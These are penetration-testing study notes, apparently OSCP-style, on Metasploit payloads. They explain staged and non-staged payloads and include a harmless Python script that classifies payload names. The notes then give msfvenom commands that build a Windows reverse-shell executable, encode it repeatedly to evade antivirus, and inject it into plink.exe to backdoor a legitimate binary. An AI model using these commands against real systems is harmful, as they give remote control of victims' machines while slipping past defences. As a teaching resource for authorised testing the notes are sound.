Payloads
Staged vs. Non-staged Payloads
A non-staged payload is sent in its entirety along with the exploit. For example:
windows/x64/meterpreter_reverse_tcp
In contrast, a staged payload is usually sent in two parts. The first part is a small primary payload (the stager) that makes the victim machine connect back to the attacker, retrieve a larger secondary payload (the stage) containing the rest of the shellcode, and then execute it. For example:
windows/x64/meterpreter/reverse_tcp
Use staged payloads when:
The vulnerability we are exploiting does not have enough buffer space to hold a full payload.
Antivirus software blocks the non-staged payload.
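The naming rule described above (a '/' between stage and stager means staged, a '_' means a single non-staged payload) can be applied mechanically. The following is an added example, not code from the original notes or from Metasploit; the architecture list is an assumption covering the common segments.

```python
"""Classify Metasploit payload names as staged or non-staged.

Added example (not from the original page). A staged payload separates
stage and stager with '/' (meterpreter/reverse_tcp); a single, non-staged
payload joins them with '_' (meterpreter_reverse_tcp).
"""
from dataclasses import dataclass
from typing import Optional

# Architecture segments that may follow the platform (assumed list).
KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}


@dataclass
class PayloadName:
    platform: str
    arch: Optional[str]   # None when the path has no arch segment
    stage: str            # the code that ultimately runs (shell, meterpreter)
    transport: str        # stager for a staged payload, e.g. reverse_tcp
    staged: bool


def parse_payload(name: str) -> PayloadName:
    """Split a path such as windows/x64/meterpreter/reverse_tcp into parts.

    A staged payload has two trailing segments (stage, stager); a non-staged
    one has a single trailing segment whose parts are joined by '_'.
    """
    parts = name.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = None
    if rest[0] in KNOWN_ARCHES:
        arch = rest.pop(0)
    if len(rest) == 2:
        stage, stager = rest
        return PayloadName(platform, arch, stage, stager, staged=True)
    if len(rest) == 1:
        # Single payload: text after the first '_' is the transport,
        # e.g. shell_reverse_tcp -> stage 'shell', transport 'reverse_tcp'.
        stage, _, transport = rest[0].partition("_")
        return PayloadName(platform, arch, stage, transport, staged=False)
    raise ValueError(f"unexpected payload layout: {name!r}")


if __name__ == "__main__":
    for n in ("windows/x64/meterpreter_reverse_tcp",
              "windows/x64/meterpreter/reverse_tcp"):
        print(n, "->", "staged" if parse_payload(n).staged else "non-staged")
```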
Executable Payloads
Generate a raw Windows PE reverse shell executable with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -o NotAShell.exe
Improve the above payload by encoding it for 9 iterations:
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o NotAShell.exe
Further improve the above payload by injecting it into an existing PE file (this effectively backdoors that executable):
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o NotAShell.exe
This payload generation process can also be accomplished within msfconsole with the generate command: